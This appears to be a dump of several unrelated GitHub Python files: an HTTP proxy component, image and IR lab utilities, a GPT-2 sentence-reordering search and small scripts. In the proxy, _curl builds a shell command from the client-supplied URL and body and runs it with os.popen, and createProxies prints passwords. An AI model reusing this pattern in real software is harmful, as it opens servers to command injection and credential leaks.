0\n #\t\t\twhile i < len(data):\n #\t\t\t\tif i > 0:\n #\t\t\t\t\ttime.sleep(1)\n #\t\t\t\tj = min(len(data), i + bytes_per_second)\n #\t\t\t\tyield data[i:j]\n #\t\t\t\ti = j\n #\t\tres = throttling_wrapper()\n #\treturn resp.status, resp.getheaders(), res\n\n# FIXME: Use Proxy properly\n\n\nclass ProxyService(Component, Proxy):\n \"\"\"This is the main component of the Proxy. It basically provided a wrapper\n around the 'curl' command line application that allows basic proxying of\n requests, and serving of local files.\"\"\"\n\n def __init__(self, proxyTo, prefix=\"/\", user=None, password=None, throttling=0):\n # TODO: Add headers processing here\n \"\"\"Creates a new proxy that will proxy to the URL indicated by\n 'proxyTo'.\"\"\"\n Component.__init__(self, name=\"Proxy\")\n # NOTE: parseURL is actually urllib3.util.parse_url, which is much\n # better than urlparse.urlparse.\n url = parseURL(proxyTo)\n self._scheme = url.scheme or \"http\"\n self._host = url.host or \"localhost\"\n self._port = url.port or 80\n self._uri = url.path or \"/\"\n self.PREFIX = prefix\n self.user = user\n self.THROTTLING = int(throttling)\n if user and password:\n self.user += \":\" + password\n\n @on(GET=\"?{parameters}\", priority=\"10\")\n @on(GET=\"{rest:rest}?{parameters}\", priority=\"10\")\n def proxyGet(self, request, rest=None, parameters=None):\n return self._proxy(request, \"GET\", rest, parameters)\n\n @on(POST=\"?{parameters}\", priority=\"10\")\n @on(POST=\"{rest:rest}?{parameters}\", priority=\"10\")\n def proxyPost(self, request, rest=None, parameters=None):\n return self._proxy(request, \"POST\", rest, parameters)\n\n @on(PUT=\"?{parameters}\", priority=\"10\")\n @on(PUT=\"{rest:rest}?{parameters}\", priority=\"10\")\n def proxyPut(self, request, rest=None, parameters=None):\n return self._proxy(request, \"PUT\", rest, parameters)\n\n @on(DELETE=\"?{parameters}\", priority=\"10\")\n @on(DELETE=\"{rest:rest}?{parameters}\", priority=\"10\")\n def proxyDelete(self, request, rest=None, parameters=None):\n return self._proxy(request, \"DELETE\", rest, parameters)\n\n def _proxy(self, request, method, rest, parameters):\n rest = rest or \"\"\n dest_uri = self._uri + rest\n while dest_uri.endswith(\"//\"):\n dest_uri = dest_uri[:-1]\n # We get the parameters as-is from the request URI (parameters is ignored\n uri_params = request.uri().split(\"?\", 1)\n if len(uri_params) == 2:\n if not dest_uri.endswith(\"?\"):\n dest_uri += \"?\"\n dest_uri += uri_params[1]\n status, headers, body = self.httpRequest(\n self._host, self._port, method, dest_uri, body=request.body(), headers=self.filterHeaders(request.headers))\n # TODO: We have a redirect, so we have to rewrite it\n if status == 302:\n pass\n return request.respond(content=body, headers=headers, status=status)\n\n# ------------------------------------------------------------------------------\n#\n# WWW-CLIENT PROXY COMPONENT\n#\n# ------------------------------------------------------------------------------\n\n\nclass WWWClientProxy(ProxyService):\n\n def start(self):\n \"\"\"Starts the component, checking if the 'curl' utility is available.\"\"\"\n if not self.hasCurl():\n raise Exception(\"wwwclient is required.\")\n\n @on(GET=\"/{rest:rest}?{parameters}\", priority=\"10\")\n def proxyGet(self, request, rest, parameters):\n uri = request.uri()\n i = uri.find(rest)\n assert i >= 0\n uri = uri[i:]\n wwwclient.browse.Session(\n self._proxyTo, client=wwwclient.curlclient.HTTPClient).get(uri)\n # TODO: Add headers processing here\n return 
request.respond(content=result, headers=[(\"Content-Type\", ctype)], status=code)\n\n @on(POST=\"/{rest:rest}\", priority=\"10\")\n def proxyPost(self, request, rest):\n uri = request.uri()\n i = uri.find(rest)\n assert i >= 0\n uri = uri[i:]\n result, ctype, code = self._curl(\n self._proxyTo, \"POST\", uri, body=request.body())\n # TODO: Add headers processing here\n return request.respond(content=result, headers=[(\"Content-Type\", ctype)], status=code)\n\n # CURL WRAPPER\n # ____________________________________________________________________________\n\n def hasWWWClient(self):\n \"\"\"Tells if the 'curl' command-line utility is avialable.\"\"\"\n import wwwclient\n return wwwclient\n\n def _curlCommand(self):\n base = \"curl \"\n if self.user:\n base += \" --anyauth -u%s \" % (self.user)\n base += \" -s -w\"\n return base\n\n def _curl(self, server, method, url, body=\"\"):\n \"\"\"This function uses os.popen to communicate with the 'curl'\n command-line client and to GET or POST requests to the given server.\"\"\"\n c = self._curlCommand()\n if method == \"GET\":\n command = c + \\\n \"'\\n\\n%{content_type}\\n\\n%{http_code}'\" + \\\n \" '%s/%s'\" % (server, url)\n result = os.popen(command).read()\n else:\n command = c + \"'\\n\\n%{content_type}\\n\\n%{http_code}'\" + \\\n \" '%s/%s' -d '%s'\" % (server, url, body)\n result = os.popen(command).read()\n code_start = result.rfind(\"\\n\\n\")\n code = result[code_start+2:]\n result = result[:code_start]\n ctype_start = result.rfind(\"\\n\\n\")\n ctype = result[ctype_start+2:]\n result = result[:ctype_start]\n return result, ctype, code\n\n# ------------------------------------------------------------------------------\n#\n# MAIN\n#\n# ------------------------------------------------------------------------------\n\n\ndef createProxies(args, options=None):\n \"\"\"Create proxy components from a list of arguments like\n\n > {prefix}={url}\n > {prefix}={user}:{password}@{url}\n \"\"\"\n components = []\n options = options or {}\n throttling = int(options.get(\"throttling\") or DEFAULT_PORT)\n for arg in args:\n prefix, url = arg.split(\"=\", 1)\n if url.find(\"@\") != -1:\n user, url = url.split(\"@\", 1)\n user, passwd = user.split(\":\", 1)\n print(\"Proxying %s:%s@%s as %s\" % (user, passwd, url, prefix))\n else:\n user, passwd = None, None\n print(\"Proxying %s as %s\" % (url, prefix))\n components.append(ProxyService(url, prefix, user=user,\n password=passwd, throttling=throttling))\n return components\n\n\ndef run(args):\n if type(args) not in (type([]), type(())):\n args = [args]\n from optparse import OptionParser\n # We create the parse and register the options\n oparser = OptionParser(version=\"Retro[+proxy]\")\n oparser.add_option(\"-p\", \"--port\", action=\"store\", dest=\"port\",\n help=OPT_PORT, default=DEFAULT_PORT)\n oparser.add_option(\"-f\", \"--files\", action=\"store_true\", dest=\"files\",\n help=\"Server local files\", default=None)\n oparser.add_option(\"-t\", \"--throttle\", action=\"store\", dest=\"throttling\",\n help=\"Throttles connection speed (in Kbytes/second)\", default=0)\n # We parse the options and arguments\n options, args = oparser.parse_args(args=args)\n if len(args) == 0:\n print(\"The URL to proxy is expected as first argument\")\n return False\n components = createProxies(args, dict(\n port=options.port, throttling=options.throttling, files=options.files))\n if options.files:\n import retro.contrib.localfiles\n print(\"Serving local files...\")\n 
components.append(retro.contrib.localfiles.LocalFiles())\n app = Application(components=components)\n import retro\n return retro.run(app=app, sessions=False, port=int(options.port))\n\n# -----------------------------------------------------------------------------\n#\n# Main\n#\n# -----------------------------------------------------------------------------\n\n\nif __name__ == \"__main__\":\n run(sys.argv[1:])\n\n# EOF\n","repo_name":"sebastien/retro","sub_path":"src/py/retro/contrib/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":12752,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"15214284497","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom PIL import ImageDraw\n\n\ndef draw_bboxes(imgs, bboxes):\n \"\"\"Drawing bounding boxes on given images.\n inputs:\n imgs = (batch_size, height, width, channels)\n bboxes = (batch_size, total_bboxes, [y1, x1, y2, x2])\n in normalized form [0, 1]\n \"\"\"\n colors = tf.constant([[1, 0, 0]], dtype=tf.float32)\n imgs_with_bb = tf.image.draw_bounding_boxes(imgs, bboxes, colors)\n plt.figure()\n for img_with_bb in imgs_with_bb:\n plt.imshow(img_with_bb)\n plt.show()\n\n#\n# def darw_bboxes(img, bboxes):\n# \"\"\"Drawing bounding boxes on given image.\n# inputs:\n# img = (height, width, channels)\n# bboxes = (total_bboxes, [y1, x1, y2, x2])\n# \"\"\"\n# image = tf.keras.preprocessing.image.array_to_img(img)\n# width, height = image.size\n# draw = ImageDraw.Draw(image)\n# color = (255, 0, 0, 255)\n# for index, bbox in enumerate(bboxes):\n# y1, x1, y2, x2 = tf.split(bbox, 4)\n# width = x2 - x1\n# height = y2 - y1\n# if width <= 0 or height <= 0:\n# continue\n# draw.rectangle((x1, y1, x2, y2), outline=color, width=1)\n# plt.figure()\n# plt.imshow(image)\n# plt.show()\n","repo_name":"LadaOndris/hands","sub_path":"src/detection/blazeface/utils/drawing_utils.py","file_name":"drawing_utils.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12692067776","text":"from collections import defaultdict\nfrom os import getcwd, listdir\nfrom os.path import isfile, join\nfrom math import log\nfrom nltk import RegexpTokenizer\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n\ndef get_count(file):\n dict = {}\n\n with open(file, encoding=\"utf8\") as txt:\n tokenizer = RegexpTokenizer(r'\\w+')\n words = tokenizer.tokenize(txt.read())\n\n for word in [word.lower() for word in words]:\n if word in dict.keys():\n dict[word] += 1\n else:\n dict[word] = 1\n return dict\n\n\n\ndef get_word_index(dir_name):\n inverted_list = defaultdict(list)\n file_path = getcwd() + \"/\" + dir_name\n for i, file_name in enumerate([f for f in listdir(file_path) if isfile(join(file_path, f))]):\n for word, count in get_count(dir_name + \"/\" + file_name).items():\n inverted_list[word].append((file_name.split('.')[0], count))\n return inverted_list\n\n\ndef terms_bar_plot(inverted_list):\n doc_terms = defaultdict(list)\n for word, indexes in inverted_list.items():\n for i, iid in enumerate(indexes):\n doc_terms[iid[0]] += [word]*iid[1]\n plt.figure(figsize=(10, 5))\n plt.hist(doc_terms.values(), bins=len(inverted_list), label=doc_terms.keys())\n plt.xticks(rotation=75)\n plt.legend()\n plt.show()\n return(\"\")\n\n\ndef tokens_hist(inverted_list):\n doc_terms = defaultdict(int)\n for word, indexes in inverted_list.items():\n for i, iid in enumerate(indexes):\n doc_terms[iid[0]] += 
1\n plt.figure(figsize=(10, 5))\n plt.hist(np.array(list(doc_terms.values())), bins=8)\n plt.show()\n\n\ndef idf(inverted_list):\n n_docs = len({item[0] for sublist in inverted_list.values() for item in sublist})\n return {word: log(n_docs/len(inverted_list[word])) for word in inverted_list}\n\n\ndef get_idf_stats(inverted_list):\n idf_stats, idfs = {}, idf(inverted_list)\n for word, indexes in inverted_list.items():\n idf_stats[word] = {'idf': idfs[word], 'indexes': indexes}\n return idf_stats\n\n\ndef ret_ocurrences(term, idf_stats):\n return [id[0] for id in idf_stats[term]['indexes']]\n\n\ndef ret_mul_ocurrences(terms, idf_stats):\n return [ret_ocurrences(term, idf_stats) for term in terms]\n\n\ndef similarity(query, idf_stats):\n n_docs = {item[0] for sublist in idf_stats for item in idf_stats[sublist]['indexes']}\n simmilarities = {word: 0 for word in n_docs}\n for term in query:\n for (id, freq) in idf_stats[term]['indexes']:\n simmilarities[id] += freq * idf_stats[term]['idf']\n return simmilarities\n\ndef main():\n print(\"1\\n 1.1\\n a)\")\n word_index = get_word_index(\"../lab1/brxts\")\n for word, indexes in word_index.items():\n print(f' {word:10}: {len(indexes):2}: {indexes}')\n print(\" b)\")\n print(\" 1.2\\n\", tokens_hist(word_index))\n idf_stats = get_idf_stats(word_index)\n print(\" 1.3\\n\", idf_stats)\n print(\"2\\n 2.1\\n\", ret_ocurrences('barata', idf_stats))\n print(\" 2.1\\n\", ret_mul_ocurrences(('a', 'barata', 'diz', 'que'), idf_stats))\n print(\"3\", similarity(('a', 'barata', 'diz', 'que', 'sapato'), idf_stats))\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"Jbarata98/PRI","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72175628426","text":"\"\"\"Accessing datasets with nsml\n==================================\n\nMachine learning relies on data. This example shows how to upload datasets to\nthe nsml cloud as well as how to access them later for training.\n\n\"\"\"\n\nimport os\nimport numpy as np\n\n# 1. Push data\n# $ nsml dataset push diabetes data/\n# 2. 
Run this\n# $ nsml run 07-data_read.py -i -d diabetes\nif 'NSML_DATASET_PATH' in os.environ: # Check if the path is set\n DATASET_PATH = os.environ['NSML_DATASET_PATH']\n DATASET_NAME = os.environ['NSML_DATASET_NAME']\n\n print(DATASET_NAME, \"in\", DATASET_PATH)\n xy = np.loadtxt(os.path.join(DATASET_PATH, 'diabetes.csv'),\n delimiter=',', dtype=np.float32)\n print(xy)\nelse:\n print('DATASET_PATH is not set')\n","repo_name":"hunkim/nsmlZeroToAll","sub_path":"07-data_read.py","file_name":"07-data_read.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"81"} +{"seq_id":"7803199821","text":"import math\nfrom shapely.geometry import Point, Polygon\nimport numpy as np\n\nfrom enclosing.path_joiner import perpendicular_line\n\n\nclass Agent:\n def __init__(self, loc, theta=0.):\n (x1, y1) = loc\n # Location\n self.x, self.y = x1, y1\n # orientation\n self.theta = theta\n # Location in the curve\n self.s = None\n\n # Trajectory\n self.traj_x = [x1]\n self.traj_y = [y1]\n self.traj_t = []\n self.traj_s = []\n\n def move_on_boundary(self, boundary, vel):\n pr = Point((self.x, self.y)) # point in robot location\n circle = pr.buffer(vel).boundary # circle around robot location\n\n boundary_polygon = Polygon(boundary).boundary\n\n intersection = circle.intersection(boundary_polygon)\n\n if intersection.is_empty:\n raise ValueError('Robot slower than boundary. Robot=(%f, %f)' % (self.x, self.y))\n\n # Intersecting points\n ip_x = np.array([p.xy[0][0] for p in intersection])\n ip_y = np.array([p.xy[1][0] for p in intersection])\n\n # angle with the robot\n angs = np.arctan2(ip_y - self.y, ip_x - self.x)\n # Convert to positive angles\n d = np.abs(self.theta - angs)\n d[d > math.pi] = np.abs(d[d > math.pi] - 2 * math.pi)\n\n #min_index = d.index(min(d))\n min_index = np.argmin(d)\n\n ## select from intersected points\n # p1, p2 = np.array(intersection[0].xy), np.array(intersection[1].xy)\n # distance to the second last point\n # a1 = math.atan2((p1[1] - self.y), (p1[0] - self.x))\n # a2 = math.atan2((p2[1] - self.y), (p2[0] - self.x))\n ## convert to positive angles\n # d1 = abs(self.theta - a1)\n # d2 = abs(self.theta - a2)\n # d1 = d1 if d1 < math.pi else abs(d1 - 2 * math.pi)\n # d2 = d2 if d2 < math.pi else abs(d2 - 2 * math.pi)\n # r = intersection[0] if d1 < d2 else intersection[1]\n # nx, ny = r.xy\n # self.x = nx[0]\n # self.y = ny[0]\n\n nx, ny = ip_x[min_index], ip_y[min_index]\n\n self.x = nx\n self.y = ny\n\n self.traj_x.append(nx)\n self.traj_y.append(ny)\n\n # Orientation between 0 and 2pi\n self.theta = math.atan2(self.traj_y[-1] - self.traj_y[-2],\n self.traj_x[-1] - self.traj_x[-2]) % (2 * math.pi)\n","repo_name":"dsaldana/boundary-estimation","sub_path":"enclosing/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70116217226","text":"import argparse\nimport os\nimport sys\nsys.path.append('../')\nimport src.utils as utils\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('--dir', required=False,\n default='../results/classifier/2000_0.5_eval_alphas.txt.gz/',\n type=str)\n args = parser.parse_args()\n print(\"The command line arguments were \", args)\n\n in_dir = args.dir\n out_dir = os.path.join(in_dir, \"official_format\")\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n for file_path in 
os.listdir(in_dir):\n\n if file_path.find(\".txt\") != -1:\n in_file = open(os.path.join(in_dir, file_path), 'r')\n out_file = open(os.path.join(out_dir, file_path), 'w')\n for line in in_file:\n text = line[2:]\n text = text.replace(\"_d\", \".d\")\n out_file.write(text)\n out_file.close()\n\n print(\"Postprocessing finished...\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Zsaknadrag/interpretability","sub_path":"src/contextual/postproc_classifier.py","file_name":"postproc_classifier.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15730334095","text":"from reorder import evaluate_files\n\nimport gc\nimport numpy as np\nimport torch as T\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\nimport time\nfrom tqdm import tqdm\nimport os\n\n\ndef score(model, padded):\n outputs = model(padded)\n\n lsm = -outputs[0].log_softmax(2)\n preds = T.zeros_like(lsm)\n preds[:, 1:] = lsm[:, :-1]\n wordscores = preds.gather(2, padded.unsqueeze(2)).squeeze(2)\n scores = wordscores.sum(1)\n\n return scores.cpu(), wordscores.cpu(), -preds.cpu()\n\n\ncand_orders = {3: [[1, 3, 2, 4]],\n 4: [[1, 4, 3, 2, 5]],\n 5: [[1, 3, 2, 5, 4, 6], [1, 3, 5, 2, 4, 6], [1, 3, 5, 4, 2, 6], [1, 4, 2, 5, 3, 6], [1, 4, 3, 5, 2, 6],\n [1, 5, 4, 3, 2, 6], [1, 5, 2, 4, 3, 6], [1, 5, 3, 2, 4, 6]]}\n\n\ndef shuffle_proposals(mat, topk, bs, kopt):\n L = mat.shape[0]\n\n I = T.zeros((kopt,) + (L,) * (kopt)).long()\n for i in range(kopt):\n I[i] = T.arange(L).view((-1,) + (1,) * (kopt - 1 - i))\n\n mask = (0 < I[0])\n for i in range(kopt - 1):\n mask *= (I[i] < I[i + 1])\n\n lv = mat.view(-1)\n\n orders = cand_orders[kopt]\n\n o = np.array(orders[np.random.randint(len(orders))])\n then = T.zeros((L,) * kopt)\n now = T.zeros_like(then)\n for i in range(kopt):\n now += lv[L * I[i] + I[i]]\n then += lv[L * I[o[i] - 1] + I[o[i + 1] - 2]]\n\n A = then - now\n\n A[~mask] = -1001\n\n topv, topi = A.view(-1).topk(min(A.numel(), topk))\n indices = np.random.randint(topi.shape[0], size=(bs,))\n topv = topv[indices]\n topi = topi[indices]\n\n orders = [o] * bs\n\n imod = [(topi // L ** (kopt - 1 - i)) % L for i in range(kopt)]\n\n return T.stack(imod, -1), topv, orders\n\n\ndef ibis(model, device, before, sentence, after, bs, topk, its, patience, warminit=False, gluemask=None):\n sent = sentence\n\n padded = T.cat([before, sent, after], 0).unsqueeze(0).to(device)\n\n zz = score(model, padded)\n orscore = zz[0][0]\n yield orscore\n\n bestscore = zz[0][0]\n\n bestsc = zz[2][0]\n\n lfix, rfix, blanks = before.shape[0] - 1, after.shape[0] - 1, 0\n\n permsents = [T.cat([before, T.from_numpy((sent.numpy())), after], 0) for _ in range(bs)]\n\n bestmask = np.full(permsents[0].shape, True)\n\n if gluemask is not None: bestmask[lfix + 1:-rfix - 1] = gluemask\n\n permmasks = [bestmask.copy() for _ in range(bs)]\n\n if not warminit:\n seg = list(np.nonzero(bestmask[lfix + 1:-rfix - 1])[0]) + [len(sent)]\n for b in range(bs):\n perm = np.random.permutation(len(seg) - 1)\n ns = []\n nm = []\n for i in range(len(seg) - 1):\n ns.append(sent[seg[perm[i]]:seg[perm[i] + 1]])\n nm.append(bestmask[lfix + 1:-rfix - 1][seg[perm[i]]:seg[perm[i] + 1]])\n permsents[b][lfix + 1:-rfix - 1] = T.cat(ns, 0)\n permmasks[b][lfix + 1:-rfix - 1] = np.concatenate(nm, 0)\n\n padded = T.stack(permsents, 0).to(device)\n\n bestsent = np.zeros(padded[0].shape)\n\n bestscore = 1000000\n movetype = 'init'\n nch = 0\n candidates = np.array([1] * bs)\n last_imp = 
0\n for it in range(its):\n\n gc.collect()\n\n if it - last_imp > patience: break\n\n sc, wsc, spr = score(model, padded)\n\n if it == 0: bestwsc = wsc[0]\n\n sc = sc.numpy()\n\n if sc.min() < bestscore:\n if it == 0 or np.any(permsents[sc.argmin()] != bestsent):\n\n nch += 1\n\n bestsent, bestscore, bestsc, bestwsc, bestmask = permsents[sc.argmin()], sc.min(), spr[sc.argmin()], \\\n wsc[sc.argmin()], permmasks[sc.argmin()]\n\n if type(bestsent) == T.Tensor: bestsent = bestsent.numpy()\n\n last_imp = it\n\n yield (it, movetype, bestscore, bestsent, bestmask)\n\n thespr = bestsc\n\n kopt = np.random.randint(3, 6)\n\n cutprobs = np.ones_like(bestwsc)\n\n cutprobs[~bestmask] = 0.\n\n cutprobs[lfix] = 100\n cutprobs[-1 - rfix] = 100\n\n if it % 2 == 0 and len(bestsent) - lfix - rfix > 6:\n ncand = bestmask[lfix:len(bestsent) - rfix].sum()\n\n if kopt == 4: ncand = min(40, ncand)\n if kopt == 5: ncand = min(20, ncand)\n\n l, r = lfix, len(bestsent) - rfix\n candidates = np.random.choice(np.arange(l, r), replace=False, p=cutprobs[l:r] / cutprobs[l:r].sum(),\n size=(ncand,))\n candidates.sort()\n\n movetype = f'GS {kopt}'\n\n else:\n\n ropt = np.random.randint(7, 15)\n\n try:\n start = np.random.randint(lfix + 1, len(bestsent) - ropt - rfix)\n\n l, r = start, start + ropt\n\n candidates = np.random.choice(np.arange(l, r), replace=False, p=cutprobs[l:r] / cutprobs[l:r].sum(),\n size=(min(ropt, (cutprobs[l:r] > 0).sum()),))\n\n except:\n ropt = min(15, len(bestsent) - lfix - rfix - 2)\n start = np.random.randint(lfix + 1, max(lfix + 2, len(bestsent) - ropt - rfix))\n\n l, r = start, start + ropt\n candidates = np.random.choice(np.arange(l, r), replace=False, p=cutprobs[l:r] / cutprobs[l:r].sum(),\n size=(min(ropt, (cutprobs[l:r] > 0).sum()),))\n\n candidates.sort()\n\n movetype = f'LS {kopt}'\n\n links = thespr[:, bestsent[candidates]][candidates]\n\n permsents = []\n permmasks = []\n\n i, v, o = shuffle_proposals(links, topk, bs, kopt)\n\n for j in range(bs):\n inds = [candidates[0]] + list(candidates[i[j]]) + [candidates[-1]]\n if v[j] > -1000:\n pieces = [bestsent[:inds[0]]]\n maskpieces = [bestmask[:inds[0]]]\n for k in range(kopt + 1):\n pieces.append(bestsent[inds[o[j][k] - 1]:inds[o[j][k]]])\n maskpieces.append(bestmask[inds[o[j][k] - 1]:inds[o[j][k]]])\n pieces.append(bestsent[inds[-1]:])\n newsent = np.concatenate(pieces, 0)\n maskpieces.append(bestmask[inds[-1]:])\n newmask = np.concatenate(maskpieces, 0)\n else:\n newsent, newmask = bestsent, bestmask\n\n permsents.append(newsent)\n permmasks.append(newmask)\n\n padded = T.stack(list(map(T.from_numpy, permsents)), 0).to(device)\n\n\ndef ibis_algorithm(s, model_name = 'gpt2'):\n T.set_grad_enabled(False)\n\n b = 128\n B = 512\n max_steps = 1024\n patience = 128\n\n device = T.device('cuda')\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n model = AutoModelForCausalLM.from_pretrained(model_name).to(device)\n\n vocab = tokenizer.get_vocab()\n vocab = {vocab[i]: i for i in vocab}\n V = len(vocab)\n\n unbreakable = np.zeros((V,))\n for v in range(V):\n unbreakable[v] = vocab[v][0].lower() in 'abcdefghijklmnopqrstuvwxyz'\n\n print(f'Loaded model {model_name}')\n\n sentence = T.LongTensor(tokenizer.encode(s))\n before = T.LongTensor(tokenizer.encode('<|endoftext|>')) # ],return_tensors='pt').input_ids[0]\n after = T.LongTensor(tokenizer.encode('<|endoftext|>')) # ],return_tensors='pt').input_ids[0]\n\n mask = (1 - unbreakable[sentence])\n mask[0] = 1\n\n last = '-----'\n for nch, k in enumerate(ibis(model, device, before, sentence, 
after, b, B, max_steps, patience, False, mask)):\n if nch == 0:\n starting = k.item()\n print('Original order NLL = ', starting)\n else:\n print(k[0], k[1], k[2], tokenizer.decode(k[3][1:-1], clean_up_tokenization_spaces=False))\n last = tokenizer.decode(k[3][1:-1], clean_up_tokenization_spaces=False)\n\n else:\n return last\n\n###############################################################################\ndef order_ibis(test_file):\n dev_file = os.path.splitext(test_file)[0] + '.dev'\n ref_file = os.path.splitext(test_file)[0] + '.ref'\n print(test_file, dev_file, ref_file)\n\n\n with open(test_file, encoding='utf-8') as test, \\\n open(dev_file, 'w', encoding='utf-8') as dev:\n sentences = test.read().split('\\n')[:-1] # remove the final blank line\n for sent in tqdm(sentences):\n prediction = ibis_algorithm(sent)\n dev.write(prediction + '\\n')\n dev.flush()\n score = evaluate_files(ref_file, dev_file)\n print(score)\n return score\n\n\n################################################# EXECUTION CODE #################################################\ndev_data_folder = 'dev_data/'\n\n\ndef main():\n inference_times =[]\n all_metrics = []\n\n test_files = ['dev_data/news.test', 'dev_data/hans.test', 'dev_data/euro.test'] # input\n refs_files = ['dev_data/news.ref', 'dev_data/hans.ref', 'dev_data/euro.ref'] # references\n\n for test_file in test_files:\n t = time.time()\n metrics = order_ibis(test_file)\n inference_times.append(time.time()-t)\n all_metrics.append(metrics)\n print('One file finished')\n\n print(test_files)\n print(inference_times)\n print(all_metrics)\n\n\nif __name__ == '__main__':\n main()","repo_name":"KacemKhaled/IFT6285-NLP-Project2","sub_path":"ibis.py","file_name":"ibis.py","file_ext":"py","file_size_in_byte":9247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40076652447","text":"# SPDX-License-Identifier: MIT\nfrom dataclasses import dataclass\nfrom typing import TYPE_CHECKING, Any, Dict, List, Optional\nfrom xml.etree import ElementTree\n\nfrom .companyrevisioninfo import CompanyRevisionInfo\nfrom .exceptions import odxrequire\nfrom .modification import Modification\nfrom .odxlink import OdxDocFragment, OdxLinkDatabase, OdxLinkId, OdxLinkRef\nfrom .teammember import TeamMember\n\nif TYPE_CHECKING:\n from .diaglayer import DiagLayer\n\n\n@dataclass\nclass DocRevision:\n \"\"\"\n Representation of a single revision of the relevant object.\n \"\"\"\n\n date: str\n team_member_ref: Optional[OdxLinkRef]\n revision_label: Optional[str]\n state: Optional[str]\n tool: Optional[str]\n company_revision_infos: List[CompanyRevisionInfo]\n modifications: List[Modification]\n\n @property\n def team_member(self) -> Optional[TeamMember]:\n return self._team_member\n\n @staticmethod\n def from_et(et_element: ElementTree.Element, doc_frags: List[OdxDocFragment]) -> \"DocRevision\":\n\n team_member_ref = OdxLinkRef.from_et(et_element.find(\"TEAM-MEMBER-REF\"), doc_frags)\n revision_label = et_element.findtext(\"REVISION-LABEL\")\n state = et_element.findtext(\"STATE\")\n date = odxrequire(et_element.findtext(\"DATE\"))\n tool = et_element.findtext(\"TOOL\")\n\n crilist = [\n CompanyRevisionInfo.from_et(cri_elem, doc_frags)\n for cri_elem in et_element.iterfind(\"COMPANY-REVISION-INFOS/\"\n \"COMPANY-REVISION-INFO\")\n ]\n\n modlist = [\n Modification.from_et(mod_elem, doc_frags)\n for mod_elem in et_element.iterfind(\"MODIFICATIONS/MODIFICATION\")\n ]\n\n return DocRevision(\n team_member_ref=team_member_ref,\n 
revision_label=revision_label,\n state=state,\n date=date,\n tool=tool,\n company_revision_infos=crilist,\n modifications=modlist,\n )\n\n def _build_odxlinks(self) -> Dict[OdxLinkId, Any]:\n return {}\n\n def _resolve_odxlinks(self, odxlinks: OdxLinkDatabase) -> None:\n self._team_member: Optional[TeamMember] = None\n if self.team_member_ref is not None:\n self._team_member = odxlinks.resolve(self.team_member_ref, TeamMember)\n\n for cri in self.company_revision_infos:\n cri._resolve_odxlinks(odxlinks)\n\n for mod in self.modifications:\n mod._resolve_odxlinks(odxlinks)\n\n def _resolve_snrefs(self, diag_layer: \"DiagLayer\") -> None:\n for cri in self.company_revision_infos:\n cri._resolve_snrefs(diag_layer)\n\n for mod in self.modifications:\n mod._resolve_snrefs(diag_layer)\n","repo_name":"mercedes-benz/odxtools","sub_path":"odxtools/docrevision.py","file_name":"docrevision.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"81"} +{"seq_id":"41110040158","text":"def areBracketsBalanced(expr):\n stack = []\n for char in expr:\n if char in [\"(\", \"{\", \"[\"]:\n stack.append(char)\n elif char not in [\")\", \"}\", \"]\"]:\n # means its a letter and not a bracket so do nothing\n None\n else:\n if not stack:\n return False\n # its opposite bracket.\n current_char = stack.pop()\n if current_char == '{':\n if char != \"}\":\n return False\n if current_char == '(':\n if char != \")\":\n return False\n if current_char == '[':\n if char != \"]\":\n return False\n\n if stack:\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n expr = \"{asd()dfs}sd[]\"\n if areBracketsBalanced(expr):\n print(\"balanced\")\n else:\n print(\"not balanced\")\n","repo_name":"nfonjeannoel/balancedbrackerts","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4701815611","text":"import random;\nimport matplotlib.pyplot as plt\n\nnums = [];\nvalues = [];\n\ntryCount = 500000;\ni = 2;\nwhile (i < 21):\n j = 0;\n deathRate = 0;\n while (j < tryCount):\n position = -2;\n k = 0;\n while (k < i):\n number = random.randint(1, 3);\n if (number == 1):\n position = position + 1;\n else:\n position = position - 1;\n\n if (position >= 0):\n deathRate = deathRate + 1;\n break;\n k = k + 1;\n\n j = j + 1;\n\n nums.append(i);\n values.append(deathRate / tryCount);\n\n i = i + 2;\n\nplt.plot(nums, values);\nplt.show()\n\nprint (nums);\nprint (values);\n","repo_name":"Giperkot/stage-12","sub_path":"third/bad var/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24508075611","text":"from __future__ import print_function\n\nimport sys\nimport collections\nimport importlib\nimport json\nimport pkgutil\nimport warnings\nfrom functools import wraps\n\nimport plotly\nimport dash_renderer\nimport flask\nfrom flask import Flask, Response\nfrom flask_compress import Compress\n\nfrom .dependencies import Event, Input, Output, State\nfrom .resources import Scripts, Css\nfrom .development.base_component import Component\nfrom . 
